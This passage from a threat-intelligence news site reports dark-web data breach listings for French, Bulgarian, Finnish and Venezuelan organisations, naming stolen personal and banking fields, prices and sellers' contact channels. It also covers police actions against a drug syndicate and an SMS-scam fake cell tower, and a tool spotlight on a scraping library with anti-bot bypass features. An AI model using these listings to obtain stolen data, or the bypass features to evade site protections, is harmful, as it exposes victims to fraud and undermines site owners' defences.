U.S. submitted an extradition request to Chile. The Chilean Supreme Court initially approved it on April 22, 2025, but Valenzuela Monje filed multiple appeals. He was ultimately arrested on the U.S. extradition request on January 14, 2026, and physically transferred to U.S. custody on February 25, 2026. Valenzuela Monje's next court appearance is scheduled for May 4, 2026, in Salt Lake City. Source: ### New Zealand Police Dismantle Dark Web Drug Syndicate in Operation Solana URL: https://darkwebinformer.com/new-zealand-police-dismantle-dark-web-drug-syndicate-in-operation-solana/ Last updated: 2026-02-26T18:38:50.000Z A nine-month investigation by New Zealand Police has dismantled a drug syndicate that relied on dark web marketplaces, encrypted messaging, and cryptocurrency to import and distribute controlled substances across the country. The operation, dubbed **Operation Solana**, was led by the National Organised Crime Group and culminated this week with **16 search warrants** executed across Auckland and Hamilton, resulting in **11 arrests**. ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/4.png) Image: NZ Police ## What Happened Investigators identified a local syndicate using anonymous online marketplaces to coordinate the importation of methamphetamine, cocaine, MDMA, and ketamine from suppliers in the United Kingdom, Europe, and the United States. The group allegedly leveraged encrypted communications and crypto services to obscure their identities and financial flows. Working alongside New Zealand Customs, Australian Border Force, U.S. law enforcement, and European agencies, authorities intercepted over **200 kilograms** of controlled drugs at international borders before they could reach the syndicate. ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/3.png) Image: NZ Police ## Seizures The search warrants yielded additional drug seizures along with: - Approximately **$500,000 NZD** in cash - **Three firearms**, including a **3D-printed firearm** - Further quantities of methamphetamine, cocaine, MDMA, and ketamine ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/1-2.png) Image: NZ Police ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/2.png) Image: NZ Police ## Charges Eleven individuals, aged 24 to 42, appeared in Auckland District Court and Hamilton District Court facing charges including: - Importation, possession, and supply of Class A, B, and C controlled drugs - Unlawful possession of firearms - Participating in an organised criminal group ## Law Enforcement Message Detective Senior Sergeant Jason Hunt from the National Organised Crime Group stated that the operation demonstrates New Zealand Police's growing capability to detect and disrupt offending in online and anonymized environments. The messaging from authorities was direct: dark web activity is not invisible, and law enforcement is increasingly equipped to identify and dismantle criminal operations hiding behind encryption and technology. Police indicated they will continue targeting individuals and networks exploiting digital platforms to facilitate drug harm within New Zealand communities. --- *Source:* [*New Zealand Police*](https://www.police.govt.nz/news/release/op-solana-police-operation-shines-light-drug-syndicate) ### DevChallenges Database Leaked With 20,000 User Records Published for Free Download URL: https://darkwebinformer.com/devchallenges-database-leaked-with-20-000-user-records-published-for-free-download/ Last updated: 2026-02-26T17:39:29.000Z Dark Web Informer - Cyber Threat Intelligence # DevChallenges Database Leaked With 20,000 User Records Published for Free Download February 26, 2026 - 7:47:22 AM UTC ![Finland](https://flagcdn.com/20x15/fi.png)Finland Technology / Education Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-02-26 07:47:22 UTC Threat Actor empathy Victim Country ![Finland](https://flagcdn.com/20x15/fi.png)Finland Industry Technology / Education Victim Organization DevChallenges Victim Site devchallenges.io Category Data Leak Severity Medium Network Open Web Total Records 20,218 ## Incident Overview A threat actor has leaked the database of DevChallenges, a platform built to help developers practice and sharpen their coding skills through hands-on challenges. The breach reportedly occurred in February 2026, and the full database has been made available as a free download. The leaked dataset contains 20,218 records and includes user profile information such as display names, email addresses, GitHub usernames, avatar URLs, and linked social media accounts including Instagram, LinkedIn, and Twitter handles. Additional profile fields like bios, skills, programming languages, locations, and UUIDs are also part of the dump. Beyond user profiles, the breach includes subscription invoice data and feedback invoice records that tie user interactions and payment activity to individual accounts. The data is being offered for free, with the download link hidden behind a reply wall. Samples posted in the listing show JSON-formatted records with detailed user profile structures and invoice entries dating back to 2023. ## Compromised Data Categories Display Names Email Addresses GitHub Usernames Avatar URLs Social Media Profiles (Instagram, LinkedIn, Twitter) Website URLs Bios Skills & Programming Languages Locations UUIDs Subscription Invoices Feedback Invoices Account Creation Dates ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing DevChallenges database leak with 20,218 records](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/37840776229810023792.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/37840776229810023792.png) [![Sample data from DevChallenges database leak showing subscription and feedback invoices](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/37840776229810023793.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/37840776229810023793.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Alleged Sale of 116,000 User Records from French Insurance Comparison Site Santeo URL: https://darkwebinformer.com/alleged-sale-of-116-000-user-records-from-french-insurance-comparison-site-santeo/ Last updated: 2026-02-26T17:04:48.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Sale of 116,000 User Records from French Insurance Comparison Site Santeo.net February 26, 2026 - 7:38:11 AM UTC ![France](https://flagcdn.com/20x15/fr.png)France Insurance / Healthcare Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-02-26 07:38:11 UTC Threat Actor HexDex Victim Country ![France](https://flagcdn.com/20x15/fr.png)France Industry Insurance / Healthcare Victim Organization Santeo.net (CAPIFINANCE) Victim Site santeo.net Category Data Breach Severity High Network Open Web Total Records 116,122 ## Incident Overview A threat actor using the handle HexDex is claiming to sell personal information belonging to 116,122 individuals from Santeo.net, a French online health insurance and mutual comparison platform operated by the brokerage company CAPIFINANCE. The service has been around since 1992, helping users compare and get quotes on health insurance and complementary coverage plans across different providers. The dataset allegedly spans records from 2001 through 2026 and includes 102,236 unique email addresses and roughly 100,000 unique phone numbers. Beyond basic contact information, the listing details a wide range of fields — full names, dates of birth, home and mobile phone numbers, physical addresses with postal codes and cities, as well as insurance-specific data like policy company names, monthly premiums, coverage options, signature dates, and the agents who handled the accounts. A sample line included in the listing shows JSON-formatted records with detailed policy information, including insurance provider names, offer descriptions, and production dates. A 1,000-record sample file is available for download. The threat actor is accepting offers via qTox and Session, with no fixed asking price listed. ## Compromised Data Categories Full Names Email Addresses Phone Numbers (Mobile & Landline) Physical Addresses Postal Codes & Cities Dates of Birth Insurance Policy Details Insurance Company Names Monthly Premiums Coverage Options Policy Signature Dates Agent Information Lead Source / Provenance ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing Santeo.net data for sale with 116,122 records](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/63568704099232994795.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/63568704099232994795.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Daily Dose of Dark Web Informer - February 25th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-february-25th-2026/ Last updated: 2026-02-25T22:56:19.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **42,400+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 44.2k Unique Visitors 128.6k Pageviews Last 30 days as of Feb 3, 2026\. Next update Feb 28th. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) 💚 ## Support Dark Web Informer Contributions help continue monitoring threats and keeping the community informed. 🟠 MoneroXMR 89Z68A33B9sNRf941f5GczU4ZzarTQsWn6dyMVUbo6mk2zYEamh9hALH1odMiVZfynKhjKPS58ASAfDyFdTW9o29Mwf4ArZ Copied 🟡 BitcoinBTC bc1qvs4pfwascp2uln90g3e3l4agnhnjrdn2t578we Copied 🔷 EthereumETH / ERC-20 / USDT 0xbA6bCf2BF50F9789504401AFbf19E8c2CCaa773D Copied Click address to copy · ETH address accepts USDT, USDC, and other ERC-20 tokens ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Website Posts ❗️ [315,000 Records from Venezuela's School of Planning Foundation Leaked with Sensitive Personal Data](https://darkwebinformer.com/315000-records-from-venezuelas-school-of-planning-foundation-leaked-with-sensitive-personal-data/) FREE 📰 [Man Arrested in São Paulo for Running Fake Cell Tower SMS Scam Operation](https://darkwebinformer.com/man-arrested-in-sao-paulo-for-running-fake-cell-tower-sms-scam-operation/) FREE ❗️ [Bulgaria's Largest Furniture Retailer Remington.bg Breached with 150,000+ Customer and Order Records for Sale](https://darkwebinformer.com/bulgarias-largest-furniture-retailer-remington-bg-breached-with-150000-customer-and-order-records-for-sale/) FREE ❗️ [352,000 Member Records from the French Aikido Federation Put Up for Sale](https://darkwebinformer.com/352000-member-records-from-the-french-aikido-federation-put-up-for-sale/) FREE ❗️ [Alleged Sale of 125,000 Records from French Temp Agency MyConnect](https://darkwebinformer.com/alleged-sale-of-125000-records-from-french-temp-agency-myconnect/) FREE X/Twitter Updates 📰 [Man Arrested in São Paulo for Running Fake Cell Tower SMS Scam Operation](https://x.com/DarkWebInformer/status/2026687005145354492?s=20) ❗️ [A threat actor has allegedly dumped 142,180 records from ek-onlineshop\[.\]at, an Austrian retail website operated by Kammerhofer & Co. GmbH (\~$5M revenue).](https://x.com/DarkWebInformer/status/2026691730750185901?s=20) ❗️ [A threat actor has allegedly dumped the full database of INIFAP Norte Centro, a regional branch of Mexico's National Institute for Forestry, Agricultural, and Livestock Research.](https://x.com/DarkWebInformer/status/2026693615729172893?s=20) ❗️ [A threat actor claims to have exfiltrated approximately 1 GB from Egypt's General Authority for Roads and Bridges, including databases, source code, and SSL certificates.](https://x.com/DarkWebInformer/status/2026697245295301082?s=20) ❗️ [A threat actor has allegedly leaked the database of UNAC (Corporación Universitaria Adventista de Colombia), containing student IDs, names, last names, and institutional emails.](https://x.com/DarkWebInformer/status/2026700863566233936?s=20) ❗️ [A threat actor is allegedly selling PII of 14,816 Malaysian Army members, including full names, emails, mobile numbers, ranks, teams, service branches, unit/force assignments, positions, army numbers, and operations center details.](https://x.com/DarkWebInformer/status/2026705077386330517?s=20) ❗️ [The same threat actor selling Malaysian Army data is also allegedly offering databases from five Malaysian government entities.](https://x.com/DarkWebInformer/status/2026706848041038149?s=20) ❗️ [Hanna Global Solutions has fallen victim to Kill Security Ransomware](https://x.com/DarkWebInformer/status/2026712384413298778?s=20) ❗️ [A threat actor has allegedly leaked a dataset of USC (Universidad Santiago de Cali), a Colombian university, containing student IDs, names, last names, and institutional emails.](https://x.com/DarkWebInformer/status/2026715896987746576?s=20) 💡 [CISA has added two Cisco vulnerabilities to the KEV Catalog](https://x.com/DarkWebInformer/status/2026721635126899072?s=20) ❗️ [Officine Fratelli Amadori SNC has been claimed a victim to NightSpire Ransomware](https://x.com/DarkWebInformer/status/2026723846582099984?s=20) 💡 [What a name.](https://x.com/DarkWebInformer/status/2026728693456920895?s=20) 💡 [I'm pretty sure I'm done adding to the new Ransomware feed and will just be fixing bugs and providing general improvements. So if you are an elite subscriber, check it out. This will likely be close to final. It will be available to Pro subscribers (including elite) next week.](https://x.com/DarkWebInformer/status/2026745738093347033?s=20) ❗️ [Hacktivist group 404Crew claims to be targeting Mexico](https://x.com/DarkWebInformer/status/2026752779159576892?s=20) ❗️ [MEDUSA Ransomware Claims 3 Victims](https://x.com/DarkWebInformer/status/2026756991377379596?s=20) ❗️ [VECT Ransomware Claims 2 Victims](https://x.com/DarkWebInformer/status/2026760546092016028?s=20) 💡 [Rapid7 put together a RAMP blog post detailing the forum's history, its role in the ransomware ecosystem, and the drama surrounding its fragmentation.](https://x.com/DarkWebInformer/status/2026780293827273040?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### Alleged Sale of 125,000 Records from French Temp Agency MyConnect URL: https://darkwebinformer.com/alleged-sale-of-125-000-records-from-french-temp-agency-myconnect/ Last updated: 2026-02-25T21:36:41.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Sale of 125,000 Records from French Temp Agency MyConnect February 25, 2026 - 8:53:53 PM UTC ![France](https://flagcdn.com/20x15/fr.png)France Employment Services / Staffing Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-02-25 20:53:53 UTC Threat Actor DumpSec Victim Country ![France](https://flagcdn.com/20x15/fr.png)France Industry Employment Services / Staffing Victim Organization MyConnect Victim Site myconnect.fr Category Data Breach Severity High Network Open Web Total Records 125,000 ## Incident Overview A threat actor going by DumpSec is claiming to sell data from MyConnect (Myconnect Interim), a French digital temporary employment agency that connects workers with companies looking for interim staff. The actor states this follows a previous breach of Adecco, suggesting a pattern of targeting staffing and employment platforms in France. According to the listing, the breach reportedly contains around 125,000 records along with a substantial document archive consisting of 21,106 files across 15,978 folders. The documents allegedly include national identity cards (CNI), RIB banking documents, photos, signed documents, and birth certificates — highly sensitive personal and financial information that could be leveraged for identity theft or fraud. The extracted data fields listed in the post cover a wide range of personal identifiers: full names, email addresses, mobile and home phone numbers, physical addresses, birth details (place, department, date), maiden names, social security numbers, national ID card numbers with issue and expiration dates, and full banking information including bank name, IBAN, and BIC codes. The threat actor is offering the data to a single buyer at an open price, with transactions handled exclusively via Session messenger using cryptocurrency. ## Compromised Data Categories Full Names Email Addresses Phone Numbers (Mobile & Home) Physical Addresses Birth Information (Place, Department, Date) Maiden Names Social Security Numbers National ID Card Numbers ID Card Issue & Expiration Dates Banking Details (IBAN, BIC, Bank Name) National Identity Card Scans (CNI) RIB Documents Signed Documents Birth Certificates Photos ## Image Preview [![Forum listing showing MyConnect data breach with 125,000 records for sale](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/80427709110007167503.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/80427709110007167503.png) ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### 352,000 Member Records from the French Aikido Federation Put Up for Sale URL: https://darkwebinformer.com/352-000-member-records-from-the-french-aikido-federation-put-up-for-sale/ Last updated: 2026-02-25T19:19:31.000Z Dark Web Informer - Cyber Threat Intelligence # 352,000 Member Records from the French Aikido Federation Put Up for Sale February 25, 2026 - 5:04:27 PM UTC ![France](https://flagcdn.com/20x15/fr.png)France Sports / Non-Profit Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-02-25 17:04:27 UTC Threat Actor HexDex Victim Country ![France](https://flagcdn.com/20x15/fr.png)France Industry Sports / Non-Profit Victim Organization FFAAA Victim Site Unknown Category Data Breach Severity Medium Network Open Web Total Records 352,502 ## Incident Overview A threat actor using the handle HexDex is selling personal information of 352,502 adherents of the Federation Francaise d'Aikido, Kinomichi et Disciplines Associees (FFAAA), France's national governing body for aikido and related martial arts. The dataset includes 343,000 unique full addresses, 63,000 unique phone numbers, and 75,000 unique email addresses. The threat actor notes the data also contains parent information for minor members, describing it as "crazy data." A 1,000-record sample file is available for download. Pricing is open to offers via qTox or Session. ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing French Aikido Federation member data for sale with 352,502 records](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/44949398943060745377.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/44949398943060745377.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Bulgaria's Largest Furniture Retailer Remington.bg Breached with 150,000+ Customer and Order Records for Sale URL: https://darkwebinformer.com/bulgarias-largest-furniture-retailer-remington-bg-breached-with-150-000-customer-and-order-records-for-sale/ Last updated: 2026-02-25T18:53:56.000Z Dark Web Informer - Cyber Threat Intelligence # Bulgaria's Largest Furniture Retailer Remington.bg Breached with 150,000+ Customer and Order Records for Sale February 25, 2026 - 4:51:32 PM UTC ![Bulgaria](https://flagcdn.com/20x15/bg.png)Bulgaria Retail / Furniture Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-02-25 16:51:32 UTC Threat Actor Niphra Victim Country ![Bulgaria](https://flagcdn.com/20x15/bg.png)Bulgaria Industry Retail / Furniture Victim Organization Remington.bg Victim Site remington.bg Category Data Breach Severity Medium Network Open Web Price $1,500 USD ## Incident Overview A threat actor using the handle Niphra claims to have breached Remington.bg, which they describe as the largest furniture retailer in Bulgaria, in early 2026\. The listing includes two datasets: over 140,000 order rows and over 130,000 customer rows. The order data contains names, phone numbers, email addresses, physical addresses with city details, order status, completion timestamps, delivery notes, and pricing information in Bulgarian. The customer data includes names, email addresses, phone numbers, contact metadata, and account timestamps. Sample rows are provided for both tables. The asking price is $1,500 USD with payment accepted via MM/Escrow. ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing Remington.bg Bulgaria data breach with 150,000+ records for sale](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/51778852579308615245.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/51778852579308615245.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Man Arrested in São Paulo for Running Fake Cell Tower SMS Scam Operation URL: https://darkwebinformer.com/man-arrested-in-sao-paulo-for-running-fake-cell-tower-sms-scam-operation/ Last updated: 2026-02-25T15:57:53.000Z São Paulo Civil Police arrested a 26-year-old man on Monday (February 23) after an investigation dubbed "[Operation Erbs Fake](https://www.cnnbrasil.com.br/nacional/sudeste/sp/golpe-do-sms-homem-e-preso-apos-investigacoes-da-policia-civil-de-sp/)" traced fraudulent SMS activity to an apartment in the Aclimação neighborhood of central São Paulo. 0:00 /0:40 1× The suspect, Moacir do Carmo Magalhães, was caught operating clandestine telecommunications equipment designed to hijack cellphone signals and blast out SMS messages containing malicious links, a technique commonly associated with fake base station (IMSI catcher/stingray-style) attacks. According to the police report, Magalhães informally confessed to operating the equipment. Officers gained access to the apartment building with the help of the building's property manager. Agents from Anatel (Brazil's National Telecommunications Agency) were also on scene and confirmed that the equipment was actively interfering with legitimate cellular carrier signals. Anatel technicians used specialized signal-tracking equipment to pinpoint apartment 303 as the source of the rogue transmissions, confirming it was the base of operations for the fraudulent SMS blasts. Inside the apartment, police found Magalhães with the devices still in operation. Authorities seized two cellphones, a laptop, a telecommunications antenna, a transmitter, and a vehicle. All seized items were sent for forensic analysis. ### 315,000 Records from Venezuela's School of Planning Foundation Leaked with Sensitive Personal Data URL: https://darkwebinformer.com/315-000-records-from-venezuelas-school-of-planning-foundation-leaked-with-sensitive-personal-data/ Last updated: 2026-02-25T18:59:16.000Z Dark Web Informer - Cyber Threat Intelligence # 315,000 Records from Venezuela's School of Planning Foundation Leaked with Sensitive Personal Data February 24, 2026 - 11:09:13 PM UTC ![Venezuela](https://flagcdn.com/20x15/ve.png)Venezuela Government / Education Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-02-24 23:09:13 UTC Threat Actor malconguerra2 Victim Country ![Venezuela](https://flagcdn.com/20x15/ve.png)Venezuela Industry Government / Education Victim Organization FEVP Victim Site Unknown Category Data Breach Severity High Network Open Web Total Records 315,000 ## Incident Overview A threat actor using the handle malconguerra2 posted a listing claiming to have leaked confidential data from the Venezuelan School of Planning Foundation (FEVP / Escuela Venezolana de Planificacion), a government training center affiliated with the Ministry of Popular Power for Planning of Venezuela. The dataset is a 217 MB compressed JSON file containing approximately 315,000 records. Sample data visible in the post shows highly sensitive personal fields including document type, cedula (national ID number), full names, gender, marital status, date of birth, country of birth, ethnicity, Afro-descendant status, family head status, number of children, children's ages, and address information. A 6,500-record sample file is also available for download. ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing Venezuelan School of Planning Foundation data breach with 315,000 records](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/70829322722224156595-1.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/70829322722224156595-1.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Scrapling: An Adaptive Web Scraping Framework That Handles Everything from Single Requests to Full-Scale Crawls URL: https://darkwebinformer.com/scrapling-an-adaptive-web-scraping-framework-that-handles-everything-from-single-requests-to-full-scale-crawls/ Last updated: 2026-02-23T21:04:15.000Z Tool Spotlight Web Scraping Open Source Feb 23, 2026 # Scrapling: An Adaptive Web Scraping Framework That Handles Everything from Single Requests to Full-Scale Crawls A Python framework that combines anti-bot bypass, adaptive element tracking, a Scrapy-like spider API, and an MCP server for AI-assisted scraping — all in one library. Built by web scrapers for web scrapers, with 10.6k stars and 38 releases. D4Vinci / Scrapling An adaptive Web Scraping framework that handles everything from a single request to a full-scale crawl! Python ★ 10.6k stars v0.4 BSD-3-Clause 678 forks 1,124 commits 5 contributors The Python web scraping ecosystem is fragmented. You use BeautifulSoup or Parsel for parsing, httpx or requests for HTTP, Playwright or Selenium for dynamic pages, and then you wire it all together yourself. Anti-bot bypass? That's another library. Adaptive element tracking when websites change? Write it yourself. Full crawling with concurrency, pause/resume, and proxy rotation? Time for Scrapy. **Scrapling** tries to be the single library that covers the entire scraping pipeline. Created by Karim Shoair (D4Vinci), it bundles an adaptive parser, multiple fetcher backends (HTTP, headless browser, stealth browser), a full spider framework, CLI tools, and an MCP server for AI-assisted scraping — all under one `pip install`. With 10.6k stars and 1,124 commits across 38 releases, it's one of the more mature entries in the space. ## // The Four Layers 🔍 Adaptive Parser CSS, XPath, and BeautifulSoup-style selectors. Smart element tracking that relocates elements after website design changes using similarity algorithms. 🌐 Multiple Fetchers Fetcher (HTTP with TLS fingerprinting), DynamicFetcher (Playwright), StealthyFetcher (anti-bot bypass with Cloudflare Turnstile support). 🕷️ Spider Framework Scrapy-like spider API with concurrent crawling, multi-session support, pause/resume checkpoints, streaming mode, and built-in export. 🤖 MCP Server Built-in MCP server for AI-assisted scraping with Claude/Cursor. Extracts targeted content before passing to the AI to reduce token usage. ## // Fetcher Architecture Scrapling's fetcher system is one of its strongest differentiators. Instead of picking a single approach, it offers three fetcher classes that share the same response interface but use different backends: | Fetcher | Backend | Use Case | | --------------- | ---------------------------- | ------------------------------------------------------------------------ | | Fetcher | HTTP (httpx-based) | Fast requests with TLS fingerprint impersonation, HTTP/3 support | | DynamicFetcher | Playwright (Chromium/Chrome) | JavaScript-rendered pages, full browser automation | | StealthyFetcher | Stealth browser | Anti-bot bypass, Cloudflare Turnstile/Interstitial, fingerprint spoofing | All three support persistent sessions (`FetcherSession`, `DynamicSession`, `StealthySession`), async variants, proxy rotation via the built-in `ProxyRotator`, and domain blocking for browser-based fetchers. The spider framework can mix multiple session types in a single crawl — route protected pages through the stealth session while fast-tracking everything else through HTTP. ## // Adaptive Element Tracking 🔄 Elements That Survive Website Redesigns Scrape elements with `auto_save=True` to build a fingerprint. Later, if the website changes its HTML structure, pass `adaptive=True` and Scrapling relocates the elements using intelligent similarity algorithms — no manual selector updates needed. This is probably the most distinctive feature. Traditional scrapers break when a website changes its class names, restructures its DOM, or moves elements around. Scrapling's adaptive mode fingerprints elements on first scrape and then uses similarity matching to relocate them after changes. It's not foolproof — major redesigns will still break things — but for the common case of incremental website changes, it means significantly less scraper maintenance. ## // Spider Framework The spider API follows the Scrapy pattern: define `start_urls`, write async `parse` callbacks, yield items or follow-up requests. But it adds several features that Scrapy doesn't offer out of the box: multi-session support (mix HTTP and headless browsers in one spider), streaming mode via `async for item in spider.stream()`, checkpoint-based pause/resume with `crawldir`, and automatic blocked request detection with retry logic. start\_urls → Concurrent fetching → parse() callback → Yield items / requests → Export JSON/JSONL Pause/resume works by passing a `crawldir` path. Press Ctrl+C for graceful shutdown, and progress is checkpointed automatically. Restart with the same directory to resume from where it stopped. This is particularly useful for long-running crawls against rate-limited targets. ## // Performance Benchmarks The project includes parser benchmarks against popular Python scraping libraries. Scrapling's parser matches Parsel/Scrapy speed and significantly outperforms BeautifulSoup, PyQuery, and Selectolax on text extraction across 5,000 nested elements: | Library | Time (ms) | vs Scrapling | | ----------------- | --------- | ------------ | | **Scrapling** | **2.02** | **1.0x** | | Parsel / Scrapy | 2.04 | 1.01x | | Raw lxml | 2.54 | 1.26x | | PyQuery | 24.17 | \~12x | | Selectolax | 82.63 | \~41x | | BS4 with lxml | 1,584 | \~784x | | BS4 with html5lib | 3,392 | \~1,679x | For adaptive element similarity searching, Scrapling clocks 2.39ms vs AutoScraper's 12.45ms — about 5x faster. All benchmarks represent averages of 100+ runs. ## // CLI and Developer Tools Beyond the library API, Scrapling includes a CLI for scraping without writing code. The `scrapling extract` command fetches a URL and outputs content as Markdown, plain text, or HTML — useful for quick data extraction or piping into other tools. There's also an interactive IPython-based scraping shell (`scrapling shell`) with built-in shortcuts for converting curl commands to Scrapling requests and previewing results in the browser. ## // Considerations ⚠️ Scope and Dependencies Scrapling tries to be everything — parser, fetcher, spider, CLI, and MCP server. This breadth means a large dependency tree when using all features. The modular install (`pip install scrapling[fetchers]`, `[ai]`, `[shell]`) helps, but the full install pulls in Playwright, browser binaries, and significant infrastructure. **Browser install required.** Using any of the browser-based fetchers requires running `scrapling install` after pip install, which downloads Chromium and system dependencies. This adds significant disk space and isn't always feasible in constrained environments, though a ready-made Docker image is available. **5 contributors.** Despite 10.6k stars and 1,124 commits, the project has a very small contributor base. The vast majority of development appears to come from the creator. This is common for solo-driven projects but raises bus-factor questions for production dependencies. **Adaptive tracking limits.** The adaptive element relocating is powerful for incremental changes, but has limits. Major website redesigns, complete structural overhauls, or fundamentally different page layouts can still break the similarity matching. It reduces maintenance, it doesn't eliminate it. **Anti-bot 